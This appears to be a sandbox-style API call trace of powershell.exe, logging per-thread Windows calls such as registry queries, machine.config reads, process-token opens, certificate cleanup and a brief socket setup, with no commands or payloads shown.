	[0802.544] CoTaskMemFree (pv=0x3c4650) 
	[0802.546] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
	[0802.546] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x1cde20 | out: lpMode=0x1cde20) returned 1
	[0802.547] CoTaskMemAlloc (cb=0x104) returned 0x3c4650
	[0802.547] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c4650, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0802.547] CoTaskMemFree (pv=0x3c4650) 
	[0802.549] SetEvent (hEvent=0x338) returned 1
	[0802.549] SetEvent (hEvent=0x330) returned 1
	[0802.549] SetEvent (hEvent=0x32c) returned 1
	[0802.549] SetEvent (hEvent=0x334) returned 1
	[0802.551] CoTaskMemAlloc (cb=0x104) returned 0x3c4650
	[0802.551] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c4650, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0802.551] CoTaskMemFree (pv=0x3c4650) 
	[0802.551] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cdb78 | out: phkResult=0x1cdb78*=0x368) returned 0x0
	[0802.552] RegQueryValueExW (in: hKey=0x368, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x1cdafc, lpData=0x0, lpcbData=0x1cdaf8*=0x0 | out: lpType=0x1cdafc*=0x0, lpData=0x0, lpcbData=0x1cdaf8*=0x0) returned 0x2

Thread:
	id = 456
	os_tid = 0x1118


Thread:
	id = 462
	os_tid = 0x1134


Thread:
	id = 1013
	os_tid = 0x1af4


Thread:
	id = 1019
	os_tid = 0x1b14


Thread:
	id = 1055
	os_tid = 0x143c


Thread:
	id = 1080
	os_tid = 0x18a4


Thread:
	id = 1081
	os_tid = 0x1868

	[0559.845] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0642.199] RegCloseKey (hKey=0x308) returned 0x0
	[0642.199] RegCloseKey (hKey=0x310) returned 0x0
	[0642.199] RegCloseKey (hKey=0x30c) returned 0x0
	[0748.706] LocalFree (hMem=0x337310) returned 0x0
	[0748.706] RegCloseKey (hKey=0x320) returned 0x0
	[0748.707] LocalFree (hMem=0x337340) returned 0x0
	[0748.707] CloseHandle (hObject=0x318) returned 1
	[0748.707] CloseHandle (hObject=0x13) returned 1
	[0748.708] CloseHandle (hObject=0xf) returned 1
	[0763.168] RegCloseKey (hKey=0x318) returned 0x0
	[0782.456] RegCloseKey (hKey=0x318) returned 0x0
	[0796.801] RegCloseKey (hKey=0x3a0) returned 0x0
	[0796.801] RegCloseKey (hKey=0x39c) returned 0x0
	[0796.802] RegCloseKey (hKey=0x378) returned 0x0
	[0796.802] RegCloseKey (hKey=0x3b4) returned 0x0
	[0796.802] RegCloseKey (hKey=0x394) returned 0x0
	[0796.802] RegCloseKey (hKey=0x390) returned 0x0
	[0796.803] RegCloseKey (hKey=0x38c) returned 0x0
	[0796.803] RegCloseKey (hKey=0x388) returned 0x0
	[0796.803] RegCloseKey (hKey=0x384) returned 0x0
	[0796.804] RegCloseKey (hKey=0x380) returned 0x0
	[0796.804] RegCloseKey (hKey=0x37c) returned 0x0
	[0796.806] RegCloseKey (hKey=0x354) returned 0x0
	[0796.806] RegCloseKey (hKey=0x3b0) returned 0x0
	[0796.806] RegCloseKey (hKey=0x3ac) returned 0x0
	[0796.807] RegCloseKey (hKey=0x374) returned 0x0
	[0796.807] RegCloseKey (hKey=0x370) returned 0x0
	[0796.807] RegCloseKey (hKey=0x36c) returned 0x0
	[0796.808] RegCloseKey (hKey=0x368) returned 0x0
	[0796.808] RegCloseKey (hKey=0x364) returned 0x0
	[0796.808] RegCloseKey (hKey=0x360) returned 0x0
	[0796.808] RegCloseKey (hKey=0x35c) returned 0x0
	[0796.809] RegCloseKey (hKey=0x358) returned 0x0
	[0796.809] RegCloseKey (hKey=0x3a8) returned 0x0
	[0796.809] RegCloseKey (hKey=0x348) returned 0x0
	[0796.809] RegCloseKey (hKey=0x344) returned 0x0
	[0796.810] RegCloseKey (hKey=0x340) returned 0x0
	[0796.810] RegCloseKey (hKey=0x33c) returned 0x0
	[0796.810] RegCloseKey (hKey=0x338) returned 0x0
	[0796.811] RegCloseKey (hKey=0x334) returned 0x0
	[0796.811] RegCloseKey (hKey=0x330) returned 0x0
	[0796.811] RegCloseKey (hKey=0x32c) returned 0x0
	[0796.811] RegCloseKey (hKey=0x3a4) returned 0x0
	[0796.811] RegCloseKey (hKey=0x318) returned 0x0
	[0811.363] RegCloseKey (hKey=0x368) returned 0x0
	[0893.059] CloseHandle (hObject=0x398) returned 1
	[0893.060] CloseHandle (hObject=0x3a0) returned 1
	[0893.060] CloseHandle (hObject=0x39c) returned 1
	[0893.060] CloseHandle (hObject=0x378) returned 1
	[0893.061] CloseHandle (hObject=0x390) returned 1
	[0893.061] CloseHandle (hObject=0x38c) returned 1
	[0893.062] CloseHandle (hObject=0x388) returned 1
	[0893.062] CloseHandle (hObject=0x410) returned 1
	[0893.062] CloseHandle (hObject=0x384) returned 1
	[0893.063] CloseHandle (hObject=0x380) returned 1
	[0893.063] CloseHandle (hObject=0x354) returned 1
	[0893.064] CloseHandle (hObject=0x37c) returned 1
	[0893.064] CloseHandle (hObject=0x40c) returned 1
	[0893.064] CloseHandle (hObject=0x368) returned 1
	[0919.934] CertFreeCRLContext (pCrlContext=0x1cdf85d0) returned 1
	[0919.935] CertFreeCRLContext (pCrlContext=0x1cdf8550) returned 1
	[0919.936] CertFreeCRLContext (pCrlContext=0x28af820) returned 1
	[0919.936] CloseHandle (hObject=0x494) returned 1
	[0919.938] CloseHandle (hObject=0x3bc) returned 1
	[0919.939] CertCloseStore (hCertStore=0x289ec60, dwFlags=0x0) returned 1
	[0919.939] CertFreeCRLContext (pCrlContext=0x28af820) returned 1
	[0919.939] CloseHandle (hObject=0x484) returned 1
	[0919.940] CloseHandle (hObject=0x480) returned 1
	[0919.940] CloseHandle (hObject=0x384) returned 1
	[0919.941] CertFreeCRLContext (pCrlContext=0x28af8a0) returned 1
	[0919.941] CloseHandle (hObject=0x380) returned 1

Thread:
	id = 1163
	os_tid = 0x13e4


Thread:
	id = 1699
	os_tid = 0x23c4

	[0803.361] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0803.366] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
	[0803.371] CoTaskMemAlloc (cb=0x104) returned 0x3c4650
	[0803.371] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c4650, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0803.371] CoTaskMemFree (pv=0x3c4650) 
	[0803.373] VirtualQuery (in: lpAddress=0x1c5edba0, lpBuffer=0x1c5eea60, dwLength=0x30 | out: lpBuffer=0x1c5eea60*(BaseAddress=0x1c5ed000, AllocationBase=0x1bc60000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0803.378] CoTaskMemAlloc (cb=0x104) returned 0x3c4650
	[0803.378] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c4650, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0803.379] CoTaskMemFree (pv=0x3c4650) 
	[0803.381] CoTaskMemAlloc (cb=0x104) returned 0x3c4650
	[0803.381] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c4650, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0803.381] CoTaskMemFree (pv=0x3c4650) 
	[0803.385] CoTaskMemAlloc (cb=0x104) returned 0x3c4650
	[0803.385] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c4650, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0803.385] CoTaskMemFree (pv=0x3c4650) 
	[0804.413] CoTaskMemAlloc (cb=0x104) returned 0x3c4650
	[0804.413] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c4650, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0804.414] CoTaskMemFree (pv=0x3c4650) 
	[0804.416] CoTaskMemAlloc (cb=0x104) returned 0x3c4650
	[0804.416] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c4650, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0804.417] CoTaskMemFree (pv=0x3c4650) 
	[0804.418] CoTaskMemAlloc (cb=0x104) returned 0x3c4650
	[0804.418] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c4650, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0804.418] CoTaskMemFree (pv=0x3c4650) 
	[0804.423] VirtualQuery (in: lpAddress=0x1c5ede50, lpBuffer=0x1c5eed10, dwLength=0x30 | out: lpBuffer=0x1c5eed10*(BaseAddress=0x1c5ed000, AllocationBase=0x1bc60000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0804.424] CoTaskMemAlloc (cb=0x104) returned 0x3c4650
	[0804.424] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c4650, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0804.424] CoTaskMemFree (pv=0x3c4650) 
	[0804.427] CoTaskMemAlloc (cb=0x104) returned 0x3c4650
	[0804.427] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c4650, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0804.427] CoTaskMemFree (pv=0x3c4650) 
	[0804.428] CoTaskMemAlloc (cb=0x104) returned 0x3c4650
	[0804.428] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c4650, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0804.428] CoTaskMemFree (pv=0x3c4650) 
	[0804.429] CoTaskMemAlloc (cb=0x104) returned 0x3c4650
	[0804.429] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c4650, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0804.429] CoTaskMemFree (pv=0x3c4650) 
	[0804.448] CoTaskMemAlloc (cb=0x104) returned 0x3c4650
	[0804.448] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c4650, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0804.448] CoTaskMemFree (pv=0x3c4650) 
	[0805.475] CoTaskMemAlloc (cb=0x104) returned 0x3c4650
	[0805.475] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c4650, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0805.475] CoTaskMemFree (pv=0x3c4650) 
	[0805.478] CoTaskMemAlloc (cb=0x104) returned 0x3c4650
	[0806.396] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c4650, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0806.396] CoTaskMemFree (pv=0x3c4650) 
	[0806.397] CoTaskMemAlloc (cb=0x104) returned 0x3c4650
	[0806.397] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c4650, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0806.397] CoTaskMemFree (pv=0x3c4650) 
	[0806.400] CoTaskMemAlloc (cb=0x104) returned 0x3c4650
	[0806.400] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c4650, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0806.400] CoTaskMemFree (pv=0x3c4650) 
	[0806.402] CoTaskMemAlloc (cb=0x104) returned 0x3c4650
	[0806.402] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c4650, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0806.402] CoTaskMemFree (pv=0x3c4650) 
	[0806.403] CoTaskMemAlloc (cb=0x104) returned 0x3c4650
	[0806.403] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c4650, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0806.403] CoTaskMemFree (pv=0x3c4650) 
	[0806.405] CoTaskMemAlloc (cb=0x104) returned 0x3c4650
	[0806.405] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c4650, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0806.405] CoTaskMemFree (pv=0x3c4650) 
	[0806.423] CoTaskMemAlloc (cb=0x104) returned 0x3c4650
	[0806.424] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c4650, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0806.424] CoTaskMemFree (pv=0x3c4650) 
	[0808.546] CoTaskMemAlloc (cb=0x104) returned 0x3c4650
	[0808.546] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c4650, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0808.546] CoTaskMemFree (pv=0x3c4650) 
	[0808.555] CoTaskMemAlloc (cb=0x104) returned 0x3c4650
	[0808.555] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c4650, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0808.555] CoTaskMemFree (pv=0x3c4650) 
	[0808.559] CoTaskMemAlloc (cb=0x104) returned 0x3c4650
	[0808.559] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c4650, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0808.559] CoTaskMemFree (pv=0x3c4650) 
	[0808.562] CoTaskMemAlloc (cb=0x104) returned 0x3c4650
	[0808.562] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c4650, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0808.562] CoTaskMemFree (pv=0x3c4650) 
	[0854.714] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1c5ed820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0854.714] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1c5ed720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0854.718] CoTaskMemAlloc (cb=0x20c) returned 0x287b8e0
	[0854.718] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x287b8e0, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0854.718] CoTaskMemFree (pv=0x287b8e0) 
	[0854.718] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x1c5ed880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39
	[0855.857] GetCurrentProcess () returned 0xffffffffffffffff
	[0855.857] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c5ed7e8 | out: TokenHandle=0x1c5ed7e8*=0x368) returned 1
	[0855.862] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\", nBufferLength=0x105, lpBuffer=0x1c5ed440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\", lpFilePart=0x0) returned 0x30
	[0855.864] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x1c5ed890 | out: lpFileInformation=0x1c5ed890*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf9bf7e3, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xdf9bf7e3, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x76d072b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x622a)) returned 1
	[0867.567] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x1c5ed3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config", lpFilePart=0x0) returned 0x45
	[0867.568] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x1c5ed840 | out: lpFileInformation=0x1c5ed840*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf9bf7e3, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xdf9bf7e3, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x76d072b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x622a)) returned 1
	[0877.439] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x1c5ed220, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config", lpFilePart=0x0) returned 0x45
	[0877.439] SetErrorMode (uMode=0x1) returned 0x1
	[0877.439] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\config\\machine.config"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x37c
	[0878.020] GetFileType (hFile=0x37c) returned 0x1
	[0878.020] SetErrorMode (uMode=0x1) returned 0x1
	[0878.021] GetFileType (hFile=0x37c) returned 0x1
	[0878.023] GetFileSize (in: hFile=0x37c, lpFileSizeHigh=0x1c5ed838 | out: lpFileSizeHigh=0x1c5ed838*=0x0) returned 0x622a
	[0882.520] ReadFile (in: hFile=0x37c, lpBuffer=0x2f9a9b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c5ed758, lpOverlapped=0x0 | out: lpBuffer=0x2f9a9b0*, lpNumberOfBytesRead=0x1c5ed758*=0x1000, lpOverlapped=0x0) returned 1
	[0884.896] ReadFile (in: hFile=0x37c, lpBuffer=0x2f9a9b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c5ed288, lpOverlapped=0x0 | out: lpBuffer=0x2f9a9b0*, lpNumberOfBytesRead=0x1c5ed288*=0x1000, lpOverlapped=0x0) returned 1
	[0885.583] ReadFile (in: hFile=0x37c, lpBuffer=0x2f9a9b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c5ed288, lpOverlapped=0x0 | out: lpBuffer=0x2f9a9b0*, lpNumberOfBytesRead=0x1c5ed288*=0x1000, lpOverlapped=0x0) returned 1
	[0885.583] ReadFile (in: hFile=0x37c, lpBuffer=0x2f9a9b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c5ed288, lpOverlapped=0x0 | out: lpBuffer=0x2f9a9b0*, lpNumberOfBytesRead=0x1c5ed288*=0x1000, lpOverlapped=0x0) returned 1
	[0885.583] ReadFile (in: hFile=0x37c, lpBuffer=0x2f9a9b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c5ed288, lpOverlapped=0x0 | out: lpBuffer=0x2f9a9b0*, lpNumberOfBytesRead=0x1c5ed288*=0x1000, lpOverlapped=0x0) returned 1
	[0885.592] ReadFile (in: hFile=0x37c, lpBuffer=0x2f9a9b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c5ed3c8, lpOverlapped=0x0 | out: lpBuffer=0x2f9a9b0*, lpNumberOfBytesRead=0x1c5ed3c8*=0x1000, lpOverlapped=0x0) returned 1
	[0885.593] ReadFile (in: hFile=0x37c, lpBuffer=0x2f9a9b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c5ed248, lpOverlapped=0x0 | out: lpBuffer=0x2f9a9b0*, lpNumberOfBytesRead=0x1c5ed248*=0x22a, lpOverlapped=0x0) returned 1
	[0885.593] ReadFile (in: hFile=0x37c, lpBuffer=0x2f9a9b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c5ed2e8, lpOverlapped=0x0 | out: lpBuffer=0x2f9a9b0*, lpNumberOfBytesRead=0x1c5ed2e8*=0x0, lpOverlapped=0x0) returned 1
	[0885.593] CloseHandle (hObject=0x37c) returned 1
	[0887.364] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1c5ed810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0887.364] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1c5ed710, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0887.364] CoTaskMemAlloc (cb=0x20c) returned 0x287b8e0
	[0887.364] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x287b8e0, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0887.364] CoTaskMemFree (pv=0x287b8e0) 
	[0887.364] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x1c5ed870, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39
	[0887.364] GetCurrentProcess () returned 0xffffffffffffffff
	[0887.364] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c5eda48 | out: TokenHandle=0x1c5eda48*=0x37c) returned 1
	[0887.365] GetCurrentProcess () returned 0xffffffffffffffff
	[0887.365] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c5eda48 | out: TokenHandle=0x1c5eda48*=0x354) returned 1
	[0887.367] GetCurrentProcess () returned 0xffffffffffffffff
	[0887.367] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c5ed7e8 | out: TokenHandle=0x1c5ed7e8*=0x380) returned 1
	[0887.368] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x1c5ed890 | out: lpFileInformation=0x1c5ed890*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0887.369] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1c5ed3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0887.370] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x1c5ed840 | out: lpFileInformation=0x1c5ed840*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0887.370] GetCurrentProcess () returned 0xffffffffffffffff
	[0887.370] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c5eda48 | out: TokenHandle=0x1c5eda48*=0x384) returned 1
	[0887.371] GetCurrentProcess () returned 0xffffffffffffffff
	[0887.371] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c5eda48 | out: TokenHandle=0x1c5eda48*=0x388) returned 1
	[0887.391] GetCurrentProcess () returned 0xffffffffffffffff
	[0887.391] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c5ed6c8 | out: TokenHandle=0x1c5ed6c8*=0x38c) returned 1
	[0888.061] GetCurrentProcess () returned 0xffffffffffffffff
	[0888.061] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c5ed6c8 | out: TokenHandle=0x1c5ed6c8*=0x390) returned 1
	[0888.427] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x394
	[0888.427] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3b4
	[0888.438] GetCurrentProcess () returned 0xffffffffffffffff
	[0888.438] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c5ed698 | out: TokenHandle=0x1c5ed698*=0x378) returned 1
	[0888.443] GetCurrentProcess () returned 0xffffffffffffffff
	[0888.443] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c5ed698 | out: TokenHandle=0x1c5ed698*=0x39c) returned 1
	[0888.452] GetCurrentProcess () returned 0xffffffffffffffff
	[0888.452] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c5ed5d8 | out: TokenHandle=0x1c5ed5d8*=0x3a0) returned 1
	[0888.460] GetCurrentProcess () returned 0xffffffffffffffff
	[0888.460] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c5ed5d8 | out: TokenHandle=0x1c5ed5d8*=0x398) returned 1
	[0888.462] GetCurrentProcess () returned 0xffffffffffffffff
	[0888.462] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c5edc18 | out: TokenHandle=0x1c5edc18*=0x3bc) returned 1
	[0888.916] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c5ebcd8 | out: phkResult=0x1c5ebcd8*=0x3c0) returned 0x0
	[0888.917] RegQueryValueExW (in: hKey=0x3c0, lpValueName="InstallationType", lpReserved=0x0, lpType=0x1c5ebc5c, lpData=0x0, lpcbData=0x1c5ebc58*=0x0 | out: lpType=0x1c5ebc5c*=0x1, lpData=0x0, lpcbData=0x1c5ebc58*=0xe) returned 0x0
	[0888.917] CoTaskMemAlloc (cb=0x12) returned 0x2894d70
	[0888.917] RegQueryValueExW (in: hKey=0x3c0, lpValueName="InstallationType", lpReserved=0x0, lpType=0x1c5ebc2c, lpData=0x2894d70, lpcbData=0x1c5ebc28*=0xe | out: lpType=0x1c5ebc2c*=0x1, lpData="Client", lpcbData=0x1c5ebc28*=0xe) returned 0x0
	[0888.917] CoTaskMemFree (pv=0x2894d70) 
	[0888.917] RegCloseKey (hKey=0x3c0) returned 0x0
	[0889.340] CoTaskMemAlloc (cb=0xcd0) returned 0x28b63c0
	[0889.341] RasEnumConnectionsW (in: param_1=0x28b63c0, param_2=0x1c5edc6c, param_3=0x1c5edc68 | out: param_1=0x28b63c0, param_2=0x1c5edc6c, param_3=0x1c5edc68) returned 0x0
	[0889.346] CoTaskMemFree (pv=0x28b63c0) 
	[0889.353] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x1c5eda78 | out: lpWSAData=0x1c5eda78) returned 0
	[0889.363] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x40c
	[0889.369] setsockopt (s=0x40c, level=65535, optname=128, optval="\x01", optlen=4) returned -1
	[0889.369] closesocket (s=0x40c) returned 0
